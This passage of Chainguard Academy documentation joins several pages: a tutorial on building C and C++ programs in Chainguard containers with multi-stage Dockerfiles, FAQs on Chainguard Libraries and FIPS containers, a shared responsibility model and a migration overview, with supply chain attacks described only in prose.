brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Containers Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Video The content in this article is also available as a video. Prerequisites To follow along with this guide, you will need to have Docker Engine and gcc, the GNU Compiler Collection, installed on your machine. You can find the code and Dockerfiles used in our Containers demos GitHub repository. Example 1 — Minimal C Chainguard Container Step 1: Setting up a Demo Application To start, let’s create a demo C application to run in your container. First you will create a folder to contain your demo files. The following command will create a new directory cguide and navigate to it. mkdir -p ~/cguide && cd ~/cguide Within this directory, you will create a file to hold the code for your first program. Use the text editor of your choice to begin editing a new file named hello.c. We will use nano as an example: nano hello.c Inside of your hello.c file, add in the following C code which will execute a “Hello, world!” application. /* Chainguard Academy (edu.chainguard.dev) * Getting Started with the C/C++ Chainguard Containers * Examples 1 & 2 - C */ #include <stdio.h> // Main Function int main(){ printf("Hello, world!\n"); printf("I am a demo from the Chainguard Academy.\n"); printf("My code was written in C.\n"); return 0; } When you are done editing the file, save and close it. If you used nano, you can do so by pressing CTRL + X, Y, and then ENTER. Now, let’s compile this file with gcc. This command uses the -Wall flag to display compiler errors and warnings, if any occur, and includes the -o flag to rename your executable to hello. gcc -Wall -o hello hello.c Once your program has compiled, you can run it with the following command: ./hello This will return the “Hello, world!” program output in your terminal if the program executed successfully. Hello, world! I am a demo from the Chainguard Academy. My code was written in C. Now that you have successfully tested your example program locally, next, you will compile and run it from inside of a container image. Step 2: Creating the Dockerfile An advantage of choosing to run your code inside of containerized environments is portability. In the previous step, gcc compiled the binary to run on your machine. However, if you were to run this binary on a different operating system, it likely will fail to execute properly. Using a container ensures that your program will run on any machine as the containerized environment will be consistent across platforms. Let us begin by creating a Dockerfile called Dockerfile1 for your container image. nano Dockerfile1 This Dockerfile will do the following: Use the gcc-glibc:latest Chainguard Container as the base image; Create and set the current working directory to /home/build; Copy the hello.c program code to the current directory; Compile the program and name it hello; Copy the compiled binary to /usr/bin; Set the image to run as a non-root user; and, Execute the compiled binary when the container is started. # Example 1 - Single Stage Build for CFROMcgr.dev/chainguard/gcc-glibc:latestRUN ["mkdir", "/home/build"]WORKDIR/home/buildCOPY hello.c ./RUN ["gcc", "-Wall", "-o", "hello", "hello.c"]RUN ["cp", "hello", "/usr/bin/hello"]USER65532ENTRYPOINT ["/usr/bin/hello"]Add this text to your Dockerfile, save, and close it. Next, use the Dockerfile you just created to build a container image named example1 by running the following command. The -f flag specifies the Dockerfile which you are using to build from, and the -t flag will tag your image with a meaningful name. docker build -f Dockerfile1 -t example1:latest . With your container image built, you can now run it with the following command. docker run --name example1 example1:latest You will see output in your terminal identical to that of the binary you compiled locally. Hello, world! I am a demo from the Chainguard Academy. My code was written in C. In the next example, we will look at an alternative way to run your binary using a multi-stage build. Example 2 — Multi-Stage Build for C Applications In our first example, you successfully compiled and executed your C binary in the gcc-glibc image. To go a step further, you can use a multi-stage build, allowing you to compile your program in one image and execute it in another image. A multi-stage build gives you more control over your final image, as you can transfer your program to an image with a smaller footprint after build time to reduce your program’s attack surface. The glibc-dynamic image, which you will use as your second stage in the build, does not contain gcc. Because of this, a malicious binary could not be compiled by an attacker tampering with the image. Creating the Dockerfile Create a new Dockerfile called Dockerfile2. nano Dockerfile2 This time, the Dockerfile will do the following: Use the gcc-glibc Chainguard Container as the builder stage; Create and set the current working directory to /home/build; Copy your example hello.c program code to the current directory; Compile the program using gcc and name it hello; Begin a new stage using the glibc-dynamic Chainguard Container; Copy the compiled binary to /usr/bin from the builder stage; Set the image to run as a non-root user; and, Execute your binary from the glibc-dynamic image when the container is started. # Example 2 - Multi-Stage Build for CFROMcgr.dev/chainguard/gcc-glibc:latest AS builderRUN ["mkdir", "/home/build"]WORKDIR/home/buildCOPY hello.c ./RUN ["gcc", "-Wall", "-o", "hello", "hello.c"]FROMcgr.dev/chainguard/glibc-dynamic:latestCOPY --from=builder /home/build/hello /usr/bin/USER65532ENTRYPOINT ["/usr/bin/hello"]When you are finished editing your Dockerfile, save and close it. With the new Dockerfile created, you can build the image. Execute the following command in your terminal to build your multi-stage image. docker build -f Dockerfile2 -t example2:latest . With your image built, you can now run it with the following command. docker run --name example2 example2:latest You will see output in your terminal identical to that of the previous example. Hello, world! I am a demo from the Chainguard Academy. My code was written in C. Having your program execute from a smaller container image with less packages reduces your potential attack surface, making it a more secure approach for production-facing builds. Example 3 — Multi-Stage Build for C++ Applications So far, our demonstrations have featured a program coded in C. A similar image building process applies to binaries compiled for the C++ programming language. Step 1: Setting up a Demo Application In your terminal, create a new file called hello.cpp. nano hello.cpp Add the following C++ code to the file you just created. This code will display a greeting specifying that it was written in C++. /* Chainguard Academy (edu.chainguard.dev) * Getting Started with the C/C++ Chainguard Containers * Example 3 - C++ */ #include <iostream>using namespace std; // Main Function int main(){ cout << "Hello, world!\n"; cout << "I am a demo from the Chainguard Academy.\n"; cout << "My code was written in C++.\n"; return 0; } When you are done editing your file, save and close it. You can now compile your C++ program using g++. Execute the following command in your terminal to compile the program. The command will display any compiler warnings or errors and will name the resultant binary hello. g++ -Wall -o hello hello.cpp Now you can test your compiled binary. ./hello You will see the following output in your terminal. Hello, world! I am a demo from the Chainguard Academy. My code was written in C++. Now that you have confirmed that your C++ program executes, you are ready to build it inside of a container image. Step 2: Creating the Dockerfile With a working C++ example, you can compile and run our program using a multi-stage build. With the text editor of your choice, create a new file named Dockerfile3. nano Dockerfile3 This Dockerfile will do the following: Use the gcc-glibc Chainguard Container as the builder stage; Create and set the current working directory to /home/build; Copy your example hello.cpp program code to the current directory; Compile the program using g++ and name it hello; Begin a new stage using the glibc-dynamic Chainguard Container; Copy the compiled binary to /usr/bin from the builder stage; Set the image to run as a non-root user; and, Execute your binary from the glibc-dynamic image when the container is started. # Example 3 - Multi-Stage Build for C++FROMcgr.dev/chainguard/gcc-glibc:latest AS builderRUN ["mkdir", "/home/build"]WORKDIR/home/buildCOPY hello.cpp ./RUN ["g++", "-Wall", "-o", "hello", "hello.cpp"]FROMcgr.dev/chainguard/glibc-dynamic:latestCOPY --from=builder /home/build/hello /usr/bin/USER65532ENTRYPOINT ["/usr/bin/hello"]When you are finished editing your Dockerfile, save and close it. With your new Dockerfile created, you can build the container image. Execute the following command in your terminal to build your multi-stage C++ image. docker build -f Dockerfile3 -t example3:latest . With your image built, you can now run it with the following command. docker run --name example3 example3:latest You will see output in your terminal identical to that of the C++ binary you compiled locally. Hello, world! I am a demo from the Chainguard Academy. My code was written in C++. With that, you have successfully performed a multi-stage image build for both C and C++ programs. Clean Up After completing the previous examples, you will have containers, images, and files remaining on your local machine. This section will show you how to remove these artifacts. You can remove the containers you built by executing the following command. docker container rm example1 example2 example3 Then, you can remove their associated container image builds as well: docker image rm example1:latest example2:latest example3:latest To remove the directory containing your Dockerfiles, binaries, and program code, run the following command: rm -r ~/cguide Following these commands, all artifacts introduced in this guide will now be removed from your machine. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose C/C++ Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Chainguard Libraries Network Requirements URL: https://edu.chainguard.dev/chainguard/libraries/network-requirements/ Last Modified: June 4, 2025 Tags: Chainguard Libraries, Reference The following sections detail the required network access to use Chainguard Libraries and the related tools such as chainctl. Access for chainctl and Other Tools For initial configuration with chainctl as well as for verification of downloaded libraries with cosign and other tools, you must have HTTPS access to the following domains: dl.enforce.dev for download and update of chainctl issuer.enforce.dev for authentication in web console and with chainctl console-api.enforce.dev for web console and chainctl to administrate and use your Chainguard accounts. console.chainguard.dev for the web console to administrate and use your Chainguard accounts. Access for Libraries Chainguard Libraries use is transparent for development efforts and typically requires no additional network access for workstations and other infrastructure running builds because the libraries are provided by the repository manager as configured for Java or Python. The repository manager application must have HTTPS access to the domain libraries.cgr.dev for library access and issuer.enforce.dev for authentication. If you are accessing Chainguard Libraries directly for testing with curl or with a build tool, the used workstation must have identical access. --- ### Chainguard Libraries FAQ URL: https://edu.chainguard.dev/chainguard/libraries/faq/ Last Modified: March 25, 2025 Tags: Chainguard Libraries, Overview What security issues can Chainguard Libraries prevent? As detailed on the background and introduction pages, Chainguard Libraries are built directly from source in the Chainguard Factory and the resulting binaries are directly provided to you by Chainguard. Chainguard operates the whole supply chain for the package lifecycle as one reliable, secure partner. You can therefore avoid issues from the following software supply chain attack surface points: Build pipeline Build system Dependency injection Bypass of CI/CD systems Library distribution Library consumption More information about these stages in the software supply chain is available on the Supply chain Levels for Software Artifacts (SLSA) website. The following examples are issues, attacks, and compromises that affect stages of the software supply chain for libraries across different language ecosystems: Malicious GlueStack Packages This May 2025 attack uploaded compromised packages to PyPI and npm that enable remote shell access and uploading files to compromised machines Chainguard Libraries would have protected against this attack. First, the packages have invalid upstream source URLs so there was no source repository. In the case of the lone exception (a package with a valid source repository link), no code was present for Chainguard to build a valid package. The Hacker News blog post on the attack Ultralytics Python project Attackers compromised the GitHub Actions workflows for the Ultralytics repository, injecting malware into PyPI package releases. Attackers pushed out four malicious versions of the Ultralytics YOLO project over the course of a week (8.3.41, 8.3.42, 8.3.45, 8.3.46). Ultralytics YOLO is a widely-used fast object detection neural network library downloaded about five million times per month. Users affected during this period were infected with cryptomining malware. Chainguard Libraries would have prevented this attack by building the project from clean source. No source code was modified by attackers during this incident. See also PyPI attack analysis and bleepingcomputer blog post. Lottie Player Hackers gained access to the NPM registry by compromising a developer authentication token. Token used to upload a compromised version of Lottie Player. The malicious package drained crypto wallet funds. Chainguard Libraries would have prevented this attack by building the project from clean source. No source code was modified by attackers during this incident. See also npm package Lottie-Player compromised in supply chain attack, Nov 2024. MavenGate MavenGate is a proof of concept for exploiting abandoned Java library domains. Vulnerabilities in Maven dependency management allow unauthorized package replacements. All Java build tools using Maven repositories, including Maven, Gradle, and Ant, could be affected. MavenGate relied on the use of multiple repositories and any attack with the proposed mechanism would not publish source code. Chainguard Libraries use replaces other repositories and the use of Chainguard Libraries, based on building from the original source, would have prevented an attack using this approach See also The Hacker News article, Oversecured blog post, and Sonatype’s take as Maven Central operator. XZ Utils backdoor Example of a supply chain attack leveraging social engineering by a patient actor Sophisticated backdoor that had remote code execution capability and the potential to affect many systems Vulnerability was patched within hours of disclosure by reverting to a previous version known to be safe. Malicious source tarball and binaries were distributed successfully, but source code repository was not compromised. Since no source code was compromised, a similar attack on a protected library ecosystem would be prevented by Chainguard Libraries XZ Utils is written in C and therefore not available as an ecosystem protected by Chainguard Libraries. However, Chainguard Containers include XZ Utils packages. These are also built from source and are not affected. See also Wikipedia article and official page from the XZ data compression. Other examples and resources The following links provide details for other software supply chain attacks. Depending on the exact details some of these attacks and approaches are prevented by use of Chainguard Libraries. Successful supply chain attack on Solana JS library PyPI packages without source Compromised PyTorch nightly Commercial artifacts with RCE vulnerability and without source on PyPI, Aug 2024 Thwarted attempts to flood npm registry PyPI Python library “aiocpa” found exfiltrating crypto keys via Telegram bot, Nov 2024 Supply chain attack detected in Solana’s web3.js library. Dec 2024 PyTorch namespace (dependency) confusion attack Typo squatting attempt to gain credentials Typo squatting attempts on Maven Central tj-actions GitHub action issue as example of build infrastructure supply chain compromise Find pointers to further resources in the Software supply chain reading list. Does Chainguard Libraries for Java include CVE remediation fixes? Short answer: No. Libraries are built from source code in the secured and hardened Chainguard infrastructure. This eliminates any build and distribution stage vulnerabilities. More details: Chainguard cannot patch Java libraries and create binaries with the same identifier because the complete behavior and API surface of every library affects the use. That use however is part of the application development of each customer. It varies widely and any change potentially creates incompatibilities, different behavior or even new security issues. Chainguard collaborates with many upstream projects and can collaborate with customers to increase and accelerate the creation and adoption of fixes and the work towards new releases. Importantly, over 95% of all known vulnerable components have a fixed version available and, by adopting those newer versions in your application, you can remediate most CVEs. Chainguard Libraries for Java includes those newest versions and adds the build and distribution channel security. What are Chibbies? Chibbies is the internal codename for the Chainguard Libraries. It evolved from Chainguard Libraries being shortened to Chainguard Libbies, and then finally to Chibbies. --- ### Chainguard Criteria for Determining Whether to Build a Container Image URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/what-chainguard-will-build/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product There are currently over 1,000 Chainguard Containers and that number is always growing as we add more to our expanding catalog. If you would like to purchase a Chainguard Container that is not yet available, or inquire about whether we would build a given container image for purchase, Chainguard will endeavor to perform an analysis on the request. Chainguard aims to build new container images that are relevant to our customers and to support broader software security goals. However, it is not always feasible to package and build software. Please note that we have the following general criteria when considering requests. The source code is freely available in a Source Code Manager (SCM) system such as GitHub or GitLab. The project is licensed under a FOSS license. Non-FOSS licenses are reviewed on a case-by-case basis. The project is actively maintained with supported versions. That is: There are recent commits and releases. The project has not reached its end of life (EOL). The project has maintained active versions. The project does not rely on outdated or unmaintained dependencies; for example, unsupported versions of Python, OpenSSL etc. There is usually a lead or owner. There are no technical blockers preventing us from building the container image as we’ve determined as part of an initial analysis process. If the software project or container image you have in mind to purchase meets the above criteria, please contact us for more information. --- ### Chainguard FIPS Container FAQs URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/fips/faqs/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product, FIPS Answers to your questions about Chainguard FIPS container images. Is there a way to enable or disable the FIPS mode in a FIPS image? All Chainguard FIPS Containers are configured in approved-only mode as noted in our FIPS commitment. For non-approved mode, our recommendation is to purchase and use a non-FIPS Chainguard Container. Because it is error prone, difficult to support, and fragile, Chainguard does not provide the ability to switch to non-FIPS from a FIPS container image. If you require that, please contact a NIST-approved security lab to help you achieve your certification needs when using our FIPS modules. Does a given Chainguard FIPS Container require me to “bring my own license”? From the Containers Directory or Containers Console, search for the container image you would like to know more about, and check if it has the “Bring Your Own License” badge. If it does, one can or must (depending on the container image) bring their own license keys for the product. Review the Overview documentation for the given image, and review the application’s documentation for further guidance. Which Chainguard Containers tags have kernel-independent FIPS? For Chainguard Containers built from November 7, 2024 onward, the minimum requirements for kernel-independent FIPS are based on the package listings in their relevant SBOMs. The SBOMs must contain: libcrypto3>=3.4.0-r2 openssl-config-fipshardened>=3.4.0-r3 This enables the use of a user-space entropy source with the ESV (Entropy Source Validation) certificate as listed on our (FIPS commitment)[https://www.chainguard.dev/legal/fips-commitment] page. Note there is no change to the CMVP (Cryptographic Module Validation Program) certificate, as the entropy source is outside of the FIPS boundary. The ESV certificate satisfies the entropy requirements caveat of the CMVP certificate. The following packages are excluded: bouncycastle-fips bouncycastle-fips-1.0 Any with -cni- in the name You can read more about kernel-independent FIPS Container in our blog announcement. How can I block SHA-1 in OpenSSL or FIPS? Right now, there are limitations on blocking specific algorithms. OpenSSL currently only offers a limited set of policies that can be applied to block generic algorithms. It has better runtime configuration options for TLS (with regard to CipherSuite selection and ECDH Curves), but nothing that can be more specific (like blocking RSA signatures with SHA2-224). Chainguard engineering is actively working with the relevant upstream groups to offer more solutions in the future. How long does it take to develop and submit a new module for FIPS certification? FIPS submission requirements continuously evolve. No project is always compliant with all the latest requirements, and typically requires testing by a certification lab followed by patching and fixing. Once the testing and patching are done, a project moves onto getting entropy certifications. Once the certifications and relevant code changes are in order, the project can submit to FIPS. Once submitted, it must move through several states: pending review, coordination, finalization, and if everything is in order a certificate will be issued. The current average wait time from submission to certificate received is 590 days. Many popular applications use Mozilla NSS, and have no alternative (that is, they cannot switch to use OpenSSL or Bouncy Castle). Can these applications get Chainguard FIPS Containers? Given Mozilla NSS’s rapid release cycles that quickly reach EOL (end-of-life), coupled with the length of time necessary for FIPS certification, the likely scenarios where NSS could become FIPS certified would not be compatible with Chainguard’s product commitments. Because Chainguard provides up-to-date software with zero-to-limited CVEs, it is not currently feasible for us to offer FIPS container images of software that use NSS. NSS does not have a stable API/ABI as it is a collection of low-level libraries, which typically are tightly coupled with the application that uses them. This is in contrast to OpenSSL, which presents one application facing API-ABI, and has an internal provider (plugin) architecture allowing the use of a separately built FIPS provider. For example, OpenSSL v3.4 released in 2024 is using the FIPS provider v3.0 released in 2021 due to strong API-ABI stability commitments. Can Chainguard provide FIPS versions of Rust applications or toolchains to build FIPS compliant Rust applications? Not yet, but we are working with upstream groups to fix this. Many compilers and interpreters provide cryptography and TLS functionality as part of their standard libraries. Most of them already use OpenSSL on Linux (such as Python, Node, .NET, and Ruby) or can be made to use OpenSSL (such as Go). The Rust standard library does not implement or provide any cryptography or TLS. This creates a challenge to FIPS compliance, as there is no default cryptographic implementation. The cryptography of an individual application written in Rust depends on which crates it leverages. The vast majority of crates that are listed under the “crypto” or “cryptography keywords have not been certified and do not have plans to complete certifications. This includes the most popular crates such as rustcrypto and ring. The most popular crate for TLS is rustls (many higher-level crates ultimately depend on rustls), which supports multiple alternative providers. As examples, rustls can use aws-lc-rs, ring, OpenSSL, and BoringCrypto implementations of the underlying (and in some cases FIPS certifiable) cryptography. However, if you run a default build of the rustls crate alone with the FIPS feature turned on today, it will pull in both FIPS and non-FIPS implementations. This is due to the dependency resolution of crates and the additive nature of features. If an application itself, and some of its dependencies, require rustls, each one of them will bring in a non-FIPS version of rustls into the binary despite a FIPS provider already present and linked into the binary. Even the most minimal applications like rustls-ffi (rustls compiled as a shared library with nothing else) and ztunnel (which uses just a single TLS mode and nothing else) link in non-FIPS cryptographic implementations in addition to the FIPS ones. In practice, this doubles the amount of dependencies in the binary, increases its size, and portions of the application end up using non-FIPS cryptography when it shouldn’t. We detected this at Chainguard because we compile all rust binaries with cargo-auditable and thus can observe which crates a given binary is linked with through rust-audit-info. Chainguard is currently exploring upstream methods for ensuring FIPS compliance given these challenges. Until then, it is not practical to build any Rust applications in FIPS mode that use TLS. Are Go binaries compiled with the upstream Golang provided GOEXPERIMENT=boringcrypto covered by the Chainguard FIPS commitment? The short answer is no. Google and Golang upstream do not provide any support for GOEXPERIMENT=boringcrypto compiled binaries. The security policy for those modules contains many unapproved algorithms. The Golang upstream toolchain does not indicate missbuilt binaries that do not use boringcrypto (at all or partially) at runtime, and correctly compiled binaries allow using unapproved algorithms without restriction. Using the Golang upstream GOEXPERIMENT=boringcrypto requires strict adherence to the security policy, manual code audits of all source code, and all go.sum vendored copies of code. Due to these caveats, we strongly recommend using the go-fips, go-msft-fips, and go-openssl Chainguard Containers. These Chainguard Containers: Use system OpenSSL as the cryptographic module in approved mode Are covered by the Chainguard FIPS Commitment Are in scope for Kernel-Independent FIPS Containers Can WireGuard with Tailscale or Shadowsocks be used for Chainguard FIPS Containers? No, the WireGuard protocol, and popular ways to use it with Tailscale and Shadowsocks cannot use approved cryptography, because the protocol requires unapproved algorithms. As it stands today, the WireGuard protocol is not customizable (like TLS), and it is not possible to replace any of the unapproved cryptographic primitives with approved equivalents as it will not be a WireGuard protocol anymore. For approved cryptography and similar functionality, please consider using OpenVPN or Strongswan, both of which can be configured to use approved cryptography only, with a FIPS cryptographic module. --- ### Chainguard Shared Responsibility Model URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/shared-responsibility-model/ Last Modified: January 13, 2025 Tags: Conceptual, Chainguard Containers, Product Chainguard’s mission is to be the safe source for open source. As part of this mission, Chainguard builds all of our packages and images from upstream open source code and delivers the resulting artifacts to our customers. There are three distinct parties involved here: Upstream projects, Chainguard, and Customers; each of these parties share some measure of responsibility across a few dimensions. This guide is an overview of Chainguard’s Shared Responsibility Model: a framework that outlines the security responsibilities of upstream open source software projects, Chainguard, and its customers. The dimensions of shared responsibility this guide covers are: Releases: defining and tracking what is and is not supported Patching: defining which parties are responsible for patching each element of what goes into a container image Testing: defining which parties are responsible for testing what scope of functionality Releases Upstream projects are responsible for cutting releases and documenting its supported release policy, including any rules it adheres to around quality or breaking changes, and (in the case of more mature projects) a release cadence or schedule. Chainguard is responsible for building all of the upstream-supported versions of a piece of software. Customers are responsible for staying on one of the upstream-supported versions of a piece of software. A common pitfall we see, which drives an enormous incidence of CVEs across our prospects, is the use of “end-of-life” (or “EOL”) software. The following diagram, taken from the Risk section of Sonatype’s 2024 State of the Software Supply Chain report, highlights how more EOL components per application tends to lead to more security vulnerabilities: It is a customer’s responsibility to stay on a supported version of the software, and the responsibility of Chainguard to ensure that the customer receives builds of that version of the software to consume in their private registry on cgr.dev. Patching Upstream projects are responsible for staying on supported releases of their own dependencies, such as with an automatic dependency update tool like dependabot or Renovate. Upstream projects are also, at a minimum, responsible for staying on an API-compatible version of libraries they depend on transitively. Chainguard is responsible for assembling container images from fully patched upstream software. You can find more details on this in our SLA for CVEs. Chainguard will also attempt to rebuild upstream software with the latest toolchain and their dependencies updated where that can be done without breaking changes (see the following Testing section). Customers are responsible for building on or with fully patched Chainguard Container Images, and for patching any components they add to the Chainguard Container Image. There are generally two form-factors of Chainguard Container Images: Application and Base images, so let’s go over the patching responsibilities through these respective lenses. Application Container Images These are Chainguard Container Images that users generally just take and run (for example, by plugging into Helm). We created the following diagram to help customers understand where the division of responsibility is generally drawn for this class of images: Upstream projects are responsible for staying on API-compatible versions of libraries. Chainguard is responsible for rebuilding the upstream project with the latest toolchain, and patching static and dynamic dependencies where such a change is non-breaking. Customers are responsible for tracking a supported version of the Chainguard image. Please refer to our Product Release Lifecycle documentation for more information on what versions are supported. Base Container Images These are Chainguard Container Images that users extend with their own packages and applications (such as with a Dockerfile). We created the following diagram to clarify where the division of responsibility is drawn for these images: Upstream projects are responsible for patching supported releases in a timely manner. Chainguard is responsible for releasing fully patched toolchain and base images. Customers are responsible for patching any applications and dependencies they add to a Chainguard image. We recommend using a fully patched Chainguard toolchain image to build the application, and using a fully patched Chainguard base image to layer the final application on. Testing Upstream projects are responsible for defining conformance criteria and establishing conformance benchmarks (such as Java TCK, Kubernetes Conformance, Knative Conformance) that clearly outline the criteria for a downstream distribution to represent itself as a “conformant” distribution of the software. Chainguard is responsible for producing conformant distributions of upstream applications; where the upstream project does not define conformance criteria Chainguard is responsible for using its discretion in validating the functionality of the application and (within reason) accepting scenarios from Customers to run as part of the Chainguard qualification process. Refer to our conceptual article on How Chainguard Container Images are Tested for more information. Customers are responsible for ensuring that Chainguard-provided images cover all of their desired functionality, and partnering with Chainguard to ensure the requisite coverage is part of our qualification process if gaps are identified. Customers are responsible for testing all of their modifications to Chainguard Container Images and for responsibly rolling out Chainguard Container Images to ensure there are no regressions specific to their environment or usage. Given the highly subjective nature of performance testing to environment and configuration, Customers are responsible for ensuring that Chainguard Container Images satisfy performance requirements as part of the responsible rollout process. Chainguard is committed to making our customers successful, and will partner with Customers (within reason) to investigate performance anomalies, but the Customer is responsible for ensuring Chainguard can reproduce the issue. Please refer to our support policy for more information on how Chainguard will partner with customers. By their minimal nature, some Chainguard Container Images may not include certain functionalities by default, so it is important that Customers ensure that Chainguard Container Images drop-in to their environments safely. Again, Chainguard is committed to making our customers successful, and will partner with Customers to ensure that images support the core scenarios in which an image is used. Following the principle of immutability, Chainguard recommends that customers pin Chainguard Container Images and make use of tooling such as dependabot, Renovate, or our own digestabot to qualify image updates through the customers’ CI/CD processes covering in-scope usage scenarios. This is key to responsibly rolling out changes because the reality is that upstream, Chainguard, and customers are all fallible and regressions can happen; but this pattern enables folks to have a clear rollback story. Learn More We encourage you to check out our other resources on recommended practices to ensure that your Chainguard Container Images are effectively maximizing your organization’s security posture. As example, you can read through our conceptual articles on Strategies for Minimizing your CVE Risk or Considerations for Keeping Container Images Up to Date. --- ### Overview of Migrating to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migrations-overview/ Last Modified: August 8, 2024 Tags: Chainguard Containers, Product Chainguard Containers are a collection of container images designed for security and minimalism. Many Chainguard Containers are distroless; they contain only an open-source application and its runtime dependencies. These container images do not even contain a shell or package manager, because fewer dependencies reduce the potential attack surface of images. By minimizing the number of dependencies and thus reducing their potential attack surface, Chainguard Containers inherently contain few to zero CVEs. Chainguard Containers are rebuilt nightly to ensure they are completely up-to-date and contain all available security patches. With this nightly build approach, our engineering team sometimes fixes vulnerabilities before they’re detected. The main features of Chainguard Containers include: Minimalist design, with no unnecessary software bloat Automated nightly builds to ensure Containers are completely up-to-date and contain all available security patches High quality build-time SBOMs (software bill of materials) attesting the provenance of all artifacts within the Container Verifiable signatures provided by Sigstore Reproducible builds with Cosign and apko (read more about reproducibility) Because of their minimalist design, Chainguard Containers sometimes require users to adjust their image workflows. This document is intended to serve as a migration guide for customers transitioning their organizations to use Chainguard Containers. It includes general tips and strategies for migrating to Chainguard Containers as well as a curated set of migration-related resources. Migration Key Points Most Chainguard Containers have no shell or package manager by default. This is great for security, but sometimes you need these things, especially in builder images. For those cases we have development container images (also known as -dev images, as in cgr.dev/chainguard/python:latest-dev) which do include a shell and package manager. The development variants and wolfi-base / chainguard-base use BusyBox by default, so any groupadd or useradd commands will need to be ported to addgroup and adduser. The free Starter tier of Containers provides only the :latest and :latest-dev versions. Our paid Production Containers offer tags for major and minor versions. Chainguard Containers are based on glibc and our packages cannot be mixed with Alpine packages (which are instead based on musl). In some cases, the entrypoint in Chainguard Containers can be different from equivalent images based on other distros, which can lead to unexpected behavior. You should always check the image’s specific documentation to understand how the entrypoint works. When needed, Chainguard recommends using a base image like chainguard-base or a development variant to install an application’s OS-level dependencies. Perhaps the best place for most users to get started with migrating to Chainguard Containers is by following our guide on How to Port a Sample Application to Chainguard Containers. This guide involves updating a sample application made up of three services to use Chainguard Containers. Although the application involved is fairly simple, the concepts outlined in the guide can also be useful for migrating more complex applications. Development Containers As mentioned previously, Chainguard’s standard container images typically do not include a shell or package manager. This helps to minimize the size of containers and also reduces their potential attack surface, but many users find that they need images that include a shell or package manager to support their specific use case. For this reason, Chainguard offers development containers (also known as -dev variants, since their image tags are appended with -dev). These variants come with more tooling than our standard container images, including a shell and package manager. Although development variants are still more secure than most popular container images based on other distros, for increased security on production environments we recommend combining them with a distroless variant in a multi-stage build. Refer to our guide on Chainguard’s Container variants for more information on development containers. Before Migrating Before you begin actively migrating to Chainguard Containers, review the images that your organization has access to and determine which teams and applications will be using each image. Notify the teams involved in the migration process so they can begin preparing. For teams that are new to Chainguard Containers, we recommend taking the online self-paced course, Linky’s Guide to Chainguard Containers. Next, determine which users and/or systems are going to need access to your Chainguard registry in order to begin preparing access. Most customers will need to copy images from their Chainguard registry into their organization’s registry. An easy way to do this is by configuring the organization’s registry as a pull-through mirror of the Chainguard registry. TWe have a guide on how to configure Artifactory for this use case. Recommended Rollout Approach When the goal is to migrate multiple deployments to Chainguard Containers, a major consideration is the strategy in which these container images are rolled out and deployed throughout your environment. The recommended rollout strategy for most customers is as follows: Start with less complex and non-critical applications to build confidence before migrating mission-critical workloads. Employ a gradual approach where you choose a small subset of container images and deploy those first to a non-production environment for testing and validation, and then to a small percentage of production instances and then gradually scale up. Use strategies like blue-green deployments or canary releases to introduce the updated container images gradually into production. We understand that customers may have urgent timelines and need to accelerate Chainguard Container deployment by rolling out many images to a larger percentage of production simultaneously. For customers to be successful in this accelerated approach, we recommend the following: Have internal Chainguard Container champions identified and ready to lead and assist cross-functionally across teams. Your teams participating in the Chainguard Container migration should have the following technical skillset: Familiarity with tools used to build images and run containers such as Docker CLI, Dockerfiles (including multi-stage builds), and orchestration platforms (Kubernetes, ECS, etc). Experience using appropriate deployment security standards (such as the Kubernetes Pod Security Standards). Experience debugging containers that have no shell. Review and understand concepts in the Shared Responsibility Model. Your organization should already have a mature container strategy in place, including: Mature and Established UAT and regression testing processes. Automated CI/CD with permissions restrictions and auditing. Monitoring, logging and runtime security. Finally, as you plan for the migration to Chainguard Containers you should ensure there’s a clear rollback plan in case of unforeseen issues during migration. Keep the previous container image tagged and accessible for quick redeployment if necessary. Adding certificates A common requirement for many customers is to add a company specific certificate or other security related content. The three most common ways to accomplish this are: Incert Dockerfile and update-ca-certificates utility Dockerfile and java keytool The process of adding or updating certificates, configuring APK repositories, and implementing other organization-specific customizations into an image is commonly known as creating a “Golden Image”. This approach enables these standard modifications to be applied once and then distributed across all teams, thereby reducing the risk of errors and minimizing friction during the migration process. Image Type Considerations Many Chainguard customers use both application and base container images, but it often takes more time to migrate your applications to a base image in comparison to an application image due to the complexity of coordinating multiple teams, testing, and release schedules. We recommend starting with and migrating to application images first while your teams get trained and onboarded with base images. Application Images When migrating to a Chainguard Application Container you should first check the image’s overview page on the Containers Directory for usage details and any compatibility notes. There may be user, permissions, or volume path differences with the Chainguard Image that you should be aware of. It is a best practice to use the same version of the Chainguard Application Image as what is currently running in your environment, if that version is availble from Chainguard. Post-migration you should thoroughly test and monitor your application. Base Images When migrating to a Chainguard Base Container you should first check the images’s overview page on the Containers Directory for usage details and any compatibility remarks. You should understand the libraries, runtime requirements, and operating system dependencies of the applications you plan to have running on the base image. It is a best practice to use the same versions of any languages or applications that will be running on the Chainguard Base Container as what is currently running in your environment. Do not upgrade language or application versions at the same time that you migrate. Post-migration you should test and monitor your application as outlined below in Section 6. If you need a package to use with your Chainguard Base Container, ChainguardOS packages are available using apk. Ensure you only use ChainguardOS packages, as Alpine APKs are not compatible with ChainguardOS. Additionally, it is important to note that vendor provided packages need to be glibc based and their functionality should be fully tested along with the application. Extending Chainguard Containers You can take advantage of Chainguard’s Custom Assembly and Private APK Repositories features to extend your container images Custom Assembly allows users to create customers container images with extra packages added. This reduces their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. Private APK Repositories, meanwhile, allow customers to pull secure apk packages from Chainguard. The list of packages available in an organization’s private repository is based on the apk repositories that the organization already has access to. For example, say your organization has access to the Chainguard MySQL container image. Along with 